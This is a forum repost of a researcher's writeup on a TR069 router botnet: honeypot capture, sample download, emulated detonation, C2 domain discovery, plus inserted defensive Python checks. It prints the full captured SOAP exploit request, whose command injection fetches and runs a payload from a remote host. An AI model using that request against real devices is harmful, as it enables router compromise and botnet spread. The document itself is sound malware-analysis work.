[Other] Quick TR069 Botnet Writeup + Triage

复制你的爱 posted on 2016-11-30 20:25:21
TL;DR: A wormable exploit for the recently published TR069 vulnerability is being actively exploited. I pulled down some samples and hacked together a goofy way to perform dynamic analysis with Docker, Qemu, and Tcpdump. The C2 domains are tr069[.]support and tr069[.]online.
  There are several different botnets propagating this worm. I'm only going to document one of them in this post. Also, I haven't written a blog post in like a year, so here goes nothing.
  Background

  A few articles have crossed my news feeds about the recent TR069 vulnerability, including the following:
  • http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/
  • https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/
  • https://isc.sans.edu/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759
  I figured I'd whip up a web server on a machine I had laying around (something like a raspberry pi) and forward TCP port 7547 through my router, as well as a sniffer for any funky stuff.
  Analysis

  Within about five minutes I was getting hits. The malicious requests have already been documented by some of the aforementioned posts, but they look something like this:

    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:7547
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 519

    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
    <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
    <NewNTPServer1>`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`</NewNTPServer1>
    <NewNTPServer2></NewNTPServer2>
    <NewNTPServer3></NewNTPServer3>
    <NewNTPServer4></NewNTPServer4>
    <NewNTPServer5></NewNTPServer5>
    </u:SetNTPServers>
    </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
  Notice the not-so-subtle command injection in this line:

    <NewNTPServer1>`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`</NewNTPServer1>
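As an added example (not code from the original post), here is a small Python check that parses a SetNTPServers request like the one above and flags any NewNTPServerN field that is not a plain hostname or IP literal. The sample request is constructed from the captured one; the "hostname characters only" rule is my own assumption about what a legitimate NTP server value looks like.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample, modelled on the request captured in the post.
SAMPLE_REQUEST = (
    "POST /UD/act?1 HTTP/1.1\r\n"
    "Host: 127.0.0.1:7547\r\n"
    "SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n"
    "Content-Type: text/xml\r\n"
    "\r\n"
    '<?xml version="1.0"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
    "<SOAP-ENV:Body>"
    '<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
    "<NewNTPServer1>`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`</NewNTPServer1>"
    "<NewNTPServer2></NewNTPServer2>"
    "</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)

# Assumption: a legitimate NTP server value is a hostname or IP literal, i.e.
# letters, digits, dots and hyphens only. Backticks, ';', '$', '|' etc. are not.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.\-]{0,253}$")


def split_request(raw):
    """Split a raw HTTP request into (lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def find_ntp_injection(raw):
    """Return [(field, value)] for NewNTPServerN fields that are not plain hostnames."""
    headers, body = split_request(raw)
    if not headers.get("soapaction", "").endswith("#SetNTPServers"):
        return []                            # only inspect the SetNTPServers action
    hits = []
    for el in ET.fromstring(body).iter():
        tag = el.tag.split("}")[-1]          # strip the XML namespace prefix
        if tag.startswith("NewNTPServer"):
            value = el.text or ""
            if not HOSTNAME_RE.match(value):
                hits.append((tag, value))
    return hits


if __name__ == "__main__":
    for field, value in find_ntp_injection(SAMPLE_REQUEST):
        print("command injection in %s: %r" % (field, value))
```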
  So I routed curl through Tor and downloaded the sample. Also, having reversed a decent amount of shitty IOT worms in my day I went on a hunch and requested hxxp://srrys[.]pw/2 through hxxp://srrys[.]pw/10 as well and got more hits.
    $ file *
    1:            ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
    2:            ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
    3:            ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
    4:            ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
    5:            ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
    6:            ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
    7:            ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
...with the following SHA256 hashes...
  If you've ever tracked IOT threats before this will be a familiar sight. Lots of malware is cross-compiled for lots of different architectures, like in this example.
  Let's do some basic static analysis. This is usually where I'd bust out my IDA Pro but some fucker stole my laptop recently and I haven't gotten my new license yet. So instead we're going to use Radare2, something equally cool but less familiar to me. Shouts out to the R2 team. Keep doing God's work.
    $ r2 1
    Warning: Cannot initialize dynamic strings
    -- Change the graph block definition with graph.callblocks, graph.jmpblocks, graph.flagblocks
    [0x00400260]> aa
    [x] Analyze all flags starting with sym. and entry0 (aa)
  I run the aa command to analyze the code/functions, followed by pdf @main to disassemble main in the regular mode and V @main + space bar to disassemble in visual mode.
  ah yes
  [screenshot 1: r2 disassembly]
  of course
  [screenshot 2: r2 disassembly]
  indeed
  [screenshot 3: r2 disassembly]
  oh wait. I don't know MIPS assembly lmfao. But I do know enough assembly to know the file is obfuscated, since the strings are broken and it has reasonably high Shannon entropy.
  [screenshot 4: r2 disassembly]

  I sure as shit don't know Motorola m68k or SPARC because I'm a useless millennial.
  My ARM is slightly better, so I could reverse that sample. But all I really want to do is find the C2 (command and control) domains.
  So static analysis is out of the question. Let's try dynamic analysis.
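The "broken strings plus high Shannon entropy" hint used above can be turned into a repeatable triage check. This is an added Python example, not code from the post: the two blobs are constructed here (a repetitive text blob and a byte permutation standing in for a packed sample), and the 7.0 bits/byte threshold and "readable strings per KB" heuristic are my own assumptions, not numbers from the post.

```python
import math
import re

# Constructed samples: a repetitive text blob (roughly what an unobfuscated
# binary's string table looks like) and a bijective byte mix standing in for a
# packed or encrypted sample. Neither is a real malware sample.
PLAIN_SAMPLE = b"cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1\n" * 50
PACKED_SAMPLE = bytes((167 * i + 13) & 0xFF for i in range(4096))

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")   # what `strings` would print


def shannon_entropy(data):
    """Entropy in bits per byte: 0.0 for a constant blob, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def printable_strings(data):
    """Printable ASCII runs of 4+ bytes, like the default output of `strings`."""
    return [s.decode("ascii") for s in PRINTABLE_RUN.findall(data)]


def triage_blob(data, entropy_threshold=7.0, min_strings_per_kb=2.0):
    """Flag a blob as likely packed/obfuscated when it is both high-entropy
    and nearly free of readable strings. Thresholds are assumed, not measured."""
    entropy = shannon_entropy(data)
    strings = printable_strings(data)
    per_kb = len(strings) / max(len(data) / 1024.0, 1e-9)
    return {
        "entropy": entropy,
        "strings": len(strings),
        "strings_per_kb": per_kb,
        "likely_obfuscated": entropy >= entropy_threshold
                             and per_kb < min_strings_per_kb,
    }


if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(name, triage_blob(blob))
```

Run it over the downloaded samples (open each file in binary mode) to get a first-pass "obfuscated or not" verdict before spending reversing time on them.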
  MIPS dynamic malware analysis on a budget

  The term "dynamic malware analysis" just refers to observing a piece of malware's behavior as it's executing. I'm not a computer engineering major in 2003 so I don't have any MIPS hardware laying around at my house. Instead I'll just emulate a MIPS device with Qemu. Qemu is an emulator, capable of emulating different kinds of hardware. Getting it to work is a pain in the ass sometimes. Fortunately someone Dockerized it.
  Docker is a container technology that makes it stupid easy to run software without worrying about things like configuration. It's awesome.
  So I grabbed the sample and pulled down the Docker container with the following command:

    $ docker run -it asmimproved/qemu-mips
    root@<container-id>:/project#

  From that shell I pulled down tcpdump into the Docker container and started logging pcap to a file.

    root@<container-id>:/project# tcpdump -w capture.pcap -n -U

  From another Bash prompt I dropped into the container, chmod +x'd the sample, and executed it with the following commands:

    $ docker exec -ti peaceful_spence bash
    root@<container-id>:/project# chmod +x 1
    root@<container-id>:/project# qemu-mipsel ./1
  You also have to worry about opsec and safe analysis and segmentation and all that, but I'll leave that stuff for a smarter reverser to explain. Anyways, the sample detonated, deobfuscated itself in memory, resolved DNS for the C2s, and started scanning the Internet for more devices to compromise. I let it run for a minute or so, pulled down the pcap, and cracked it open. I found scans to random IPs on TCP ports 7547 and 5555.
  My pcap data showed me the two callback domains for command and control are tr069[.]online and tr069[.]support. Very sneaky.
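To make that pcap review repeatable, here is an added Python example (not the author's code) that reads the text output of `tcpdump -n -r capture.pcap` and pulls out the two things the post looked for: DNS lookups made by the sandbox and the SYNs it sends out to the Internet. The sample lines are constructed; 172.17.0.2 is assumed as the container's address, and the "three or more hosts on four or fewer ports" scanner heuristic is my own.

```python
import re
from collections import Counter

# Constructed sample of `tcpdump -n` text output, modelled on the behaviour the
# post describes: C2 lookups, then SYNs to 7547/5555. Targets use documentation
# address ranges, not real hosts; 172.17.0.2 is an assumed container address.
SAMPLE_TCPDUMP = """\
12:00:01.000001 IP 172.17.0.2.41234 > 8.8.8.8.53: 12345+ A? tr069.online. (30)
12:00:01.100000 IP 172.17.0.2.41235 > 8.8.8.8.53: 12346+ A? tr069.support. (31)
12:00:02.000000 IP 172.17.0.2.51000 > 203.0.113.7.7547: Flags [S], seq 1, win 29200, length 0
12:00:02.000100 IP 172.17.0.2.51001 > 198.51.100.9.5555: Flags [S], seq 2, win 29200, length 0
12:00:02.000200 IP 172.17.0.2.51002 > 192.0.2.14.7547: Flags [S], seq 3, win 29200, length 0
12:00:02.000300 IP 172.17.0.2.51003 > 192.0.2.99.7547: Flags [S], seq 4, win 29200, length 0
12:00:02.000400 IP 203.0.113.7.7547 > 172.17.0.2.51000: Flags [S.], seq 9, ack 2, win 5840, length 0
"""

DNS_QUERY = re.compile(r"IP (\S+)\.\d+ > \S+\.53: \d+\+ A\? (\S+)\. ")
TCP_SYN = re.compile(r"IP (\S+)\.\d+ > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[S\]")


def triage_capture(text, sandbox_ip, min_targets=3, max_ports=4):
    """Summarise what the detonated sample did on the wire."""
    names, targets, ports = set(), set(), Counter()
    for line in text.splitlines():
        m = DNS_QUERY.search(line)
        if m and m.group(1) == sandbox_ip:
            names.add(m.group(2))            # names the sample resolved
            continue
        m = TCP_SYN.search(line)
        if m and m.group(1) == sandbox_ip:   # outbound SYNs only ([S], not [S.])
            targets.add(m.group(2))
            ports[int(m.group(3))] += 1
    return {
        "dns": sorted(names),
        "scan_ports": dict(ports),
        "distinct_targets": len(targets),
        # many distinct hosts on a handful of ports is scanner behaviour
        "looks_like_scanner": len(targets) >= min_targets and len(ports) <= max_ports,
    }


if __name__ == "__main__":
    print(triage_capture(SAMPLE_TCPDUMP, "172.17.0.2"))
```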
  [screenshot: pcap showing the C2 lookups]

  Whois data shows me both domains were registered earlier today.

    $ whois tr069.support
    Domain Name: tr069.support
    Domain ID: fec618e5a8fd4ac7bbc5597a04696b08-DONUTS
    WHOIS Server: www.gandi.net/whois
    Referral URL: https://www.gandi.net
    Updated Date: 2016-11-29T10:40:22Z
    Creation Date: 2016-11-29T10:40:22Z
    ...
  Conclusion

  There's nothing sophisticated about this malware. It probably doesn't affect your network. But the number of vulnerable devices on the Internet is something you should give a shit about. This is how botnets happen, and botnets are how big DDoS attacks happen.
  I don't have a Yara signature for this malware because nobody uses Yara on embedded devices.
  My recommendations?
  • Don't give your money to vendors that have a long history of consistently not giving a shit about securing their products
  • Check if port 7547 is open on your router. If so, probably just buy a new router
  • If you want to be really paranoid and you run a big website or company, use Shodan to find all the vulnerable devices and go ahead and block them so you don't have to worry about getting caught in the DDoS fallout when it inevitably happens.
  Hit me up on Twitter or shoot me an email if you have any questions. Thanks for reading my post!
  --Andrew
郭为 posted on 2016-12-17 17:10:30
复制你的爱's level is really high!